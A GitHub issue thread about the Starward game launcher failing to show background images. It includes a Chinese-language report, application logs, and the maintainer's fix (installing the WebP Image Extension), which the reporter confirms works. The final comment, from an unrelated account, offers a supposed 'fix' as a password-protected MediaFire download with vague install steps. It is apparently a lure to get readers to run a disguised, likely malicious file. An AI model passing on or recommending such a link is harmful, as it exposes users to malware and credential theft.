### ISSUE TITLE
[Bug] Starward 背景图片不显示

### ISSUE THREAD

**Issue by bite-bitwise** [Scighost/Starward#1069]
### Checklist

- [X] My issue was not mentioned by others, and it is not a duplicate issue.

### Description

Starward不显示背景图片  
疑似这个图片下载存在问题，导致图片不能打开，我尝试是删除bg文件夹内的所有图片（这些图片也不可以被系统自带图片应用查看），但仍然无效。

### Reproduction Steps

我下载安装时，挂了梯子，之后打开时梯子也是开着的，开始有一张默认的图片，之后可能是程序下载了最新的图片，而这些图片无法打开，导致了这个错误。

### Screenshots

![image](https://github.com/user-attachments/assets/64737635-13d4-4985-8efb-62ae3a002e49)

### Starward Version

0.13.0/0.13.1

### Windows Version

Windows 11 专业版 23H2 操作系统版本 22635.4145 体验	Windows Feature Experience Pack 1000.22700.1039.0

### Log

```shell
[14:14:41.801] [INFO] 
Welcome to Starward v0.13.1
System: Microsoft Windows NT 10.0.22635.0
Command Line: C:\Apps\Starward\app-0.13.1\Starward.dll

[14:14:42.039] [INFO] Starward.Services.DatabaseService
Database path is 'C:\Apps\Starward'

[14:14:42.257] [INFO] Starward.Services.DatabaseService
Database version is 10, target version is 10.

[14:14:42.369] [INFO] Starward.Pages.MainPage
Last game region is hk4e_cn

[14:14:42.381] [INFO] Starward.Pages.MainPage
Navigate to "GameLauncherPage" with param hk4e_cn

[14:14:43.067] [INFO] Starward.Pages.GameLauncherPage
Game install path of hk4e_cn: "C:\Apps\miHoYo\Genshin Impact Game"

[14:14:43.081] [INFO] Starward.Pages.GameLauncherPage
Acutal version and gamebiz of hk4e_cn is "5.0.0".

[14:14:43.468] [WARN] Starward.Pages.MainPage
Update background image
System.Runtime.InteropServices.COMException (0x88982F8B)
   at Starward.Pages.MainPage.UpdateBackgroundImageAsync(Boolean force) in D:\a\Starward\Starward\src\Starward\Pages\MainPage.xaml.cs:line 369

[14:14:44.023] [INFO] Starward.Services.UpdateService
Start to check update (Preview: True, Arch: X64)

[14:14:44.672] [INFO] Starward.Services.UpdateService
Current version: "0.13.1", latest version: "0.13.1", ignore version: null

[14:14:59.826] [INFO] Starward.Pages.MainPage
Navigate to "GameSettingPage" with param hk4e_cn

[14:15:01.371] [INFO] Starward.Pages.MainPage
Navigate to "ScreenshotPage" with param hk4e_cn

[14:15:01.424] [WARN] Starward.Pages.ScreenshotPage
Cannot find screenshot folder

[14:15:02.218] [INFO] Starward.Pages.MainPage
Navigate to "GachaLogPage" with param hk4e_cn

[14:15:03.295] [INFO] Starward.Pages.MainPage
Navigate to "HoyolabToolboxPage" with param hk4e_cn

[14:15:03.304] [INFO] Starward.Services.GameRecordService
Change region to China.

[14:15:04.925] [INFO] Starward.Pages.MainPage
Navigate to "GameLauncherPage" with param hk4e_cn

[14:15:05.002] [INFO] Starward.Pages.GameLauncherPage
Game install path of hk4e_cn: "C:\Apps\miHoYo\Genshin Impact Game"

[14:15:05.025] [INFO] Starward.Pages.GameLauncherPage
Acutal version and gamebiz of hk4e_cn is "5.0.0".

[14:15:05.681] [INFO] Starward.Pages.MainPage
Navigate to "SelfQueryPage" with param hk4e_cn

[14:16:04.755] [INFO] Starward.Pages.MainPage
Navigate to "GameLauncherPage" with param hk4e_cn

[14:16:04.820] [INFO] Starward.Pages.GameLauncherPage
Game install path of hk4e_cn: "C:\Apps\miHoYo\Genshin Impact Game"

[14:16:04.846] [INFO] Starward.Pages.GameLauncherPage
Acutal version and gamebiz of hk4e_cn is "5.0.0".

[14:23:46.301] [WARN] Starward.Pages.MainPage
Update background image
System.Runtime.InteropServices.COMException (0x88982F8B)
   at Starward.Pages.MainPage.UpdateBackgroundImageAsync(Boolean force) in D:\a\Starward\Starward\src\Starward\Pages\MainPage.xaml.cs:line 369

[14:23:51.292] [WARN] Starward.Pages.MainPage
Update background image
System.Runtime.InteropServices.COMException (0x88982F8B)
   at Starward.Pages.MainPage.UpdateBackgroundImageAsync(Boolean force) in D:\a\Starward\Starward\src\Starward\Pages\MainPage.xaml.cs:line 369

[14:23:54.489] [INFO] Starward.Pages.MainPage
Navigate to "GameSettingPage" with param hk4e_cn

[14:23:55.700] [INFO] Starward.Pages.MainPage
Navigate to "ScreenshotPage" with param hk4e_cn

[14:23:55.739] [WARN] Starward.Pages.ScreenshotPage
Cannot find screenshot folder

[14:23:56.448] [INFO] Starward.Pages.MainPage
Navigate to "GachaLogPage" with param hk4e_cn

[14:23:57.128] [INFO] Starward.Pages.MainPage
Navigate to "HoyolabToolboxPage" with param hk4e_cn

[14:23:57.135] [INFO] Starward.Services.GameRecordService
Change region to China.

[14:23:59.274] [INFO] Starward.Pages.MainPage
Navigate to "GameLauncherPage" with param hk4e_cn

[14:23:59.334] [INFO] Starward.Pages.GameLauncherPage
Game install path of hk4e_cn: "C:\Apps\miHoYo\Genshin Impact Game"

[14:23:59.357] [INFO] Starward.Pages.GameLauncherPage
Acutal version and gamebiz of hk4e_cn is "5.0.0".

[14:23:59.996] [INFO] Starward.Pages.MainPage
Navigate to "SelfQueryPage" with param hk4e_cn

[14:24:01.812] [INFO] Starward.Pages.MainPage
Navigate to "GameLauncherPage" with param hk4e_cn

[14:24:01.855] [INFO] Starward.Pages.GameLauncherPage
Game install path of hk4e_cn: "C:\Apps\miHoYo\Genshin Impact Game"

[14:24:01.861] [INFO] Starward.Pages.GameLauncherPage
Acutal version and gamebiz of hk4e_cn is "5.0.0".

[14:24:17.599] [INFO] Starward.Pages.MainPage
Navigate to "ScreenshotPage" with param hk4e_cn

[14:24:17.629] [WARN] Starward.Pages.ScreenshotPage
Cannot find screenshot folder

[14:24:18.432] [INFO] Starward.Pages.MainPage
Navigate to "GachaLogPage" with param hk4e_cn

[14:24:19.360] [INFO] Starward.Pages.MainPage
Navigate to "HoyolabToolboxPage" with param hk4e_cn

[14:24:19.366] [INFO] Starward.Services.GameRecordService
Change region to China.

[14:24:20.743] [INFO] Starward.Pages.MainPage
Navigate to "GameLauncherPage" with param hk4e_cn

[14:24:20.805] [INFO] Starward.Pages.GameLauncherPage
Game install path of hk4e_cn: "C:\Apps\miHoYo\Genshin Impact Game"

[14:24:20.826] [INFO] Starward.Pages.GameLauncherPage
Acutal version and gamebiz of hk4e_cn is "5.0.0".
```

### Additional Context

上面是我从设置中打开日志文件的的内容，但这个问题并不是我今天才遇到的，而是之前遇到了没提，我看了一些日志，下面是关于背景图片的错误和警告（并非来自同一日志文件）

[17:42:00.453] [EROR] Starward.Pages.MainPage
Update background image
System.ArgumentOutOfRangeException: Unknown launcher id. (Parameter 'launcherId')
   at Starward.Core.HoYoPlay.HoYoPlayClient.BuildUrl(String api, String launcherId, String language) in D:\a\Starward\Starward\src\Starward.Core\HoYoPlay\HoYoPlayClient.cs:line 78
   at Starward.Core.HoYoPlay.HoYoPlayClient.GetGameBackgroundAsync(String launcherId, String language, CancellationToken cancellationToken) in D:\a\Starward\Starward\src\Starward.Core\HoYoPlay\HoYoPlayClient.cs:line 109
   at Starward.Services.HoYoPlayService.GetGameBackgroundAsync(GameBiz biz) in D:\a\Starward\Starward\src\Starward\Services\HoYoPlayService.cs:line 274
   at Starward.Services.Launcher.LauncherBackgroundService.GetBackgroundImageUrlAsync(GameBiz gameBiz, CancellationToken cancellationToken) in D:\a\Starward\Starward\src\Starward\Services\Launcher\LauncherBackgroundService.cs:line 102
   at Starward.Services.Launcher.LauncherBackgroundService.GetBackgroundImageAsync(GameBiz gameBiz, Boolean disableCustom) in D:\a\Starward\Starward\src\Starward\Services\Launcher\LauncherBackgroundService.cs:line 125
   at Starward.Pages.MainPage.UpdateBackgroundImageAsync(Boolean force) in D:\a\Starward\Starward\src\Starward\Pages\MainPage.xaml.cs:line 347

[17:45:05.682] [WARN] Starward.Pages.MainPage
Update background image
System.Runtime.InteropServices.COMException (0x88982F8B)
   at Starward.Pages.MainPage.UpdateBackgroundImageAsync(Boolean force) in D:\a\Starward\Starward\src\Starward\Pages\MainPage.xaml.cs:line 369

**Comment by Scighost** [comment]
微软商店安装 **Webp 图像扩展**

**Comment by bite-bitwise** [comment]
> 微软商店安装 **Webp 图像扩展**

可以了，感谢

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
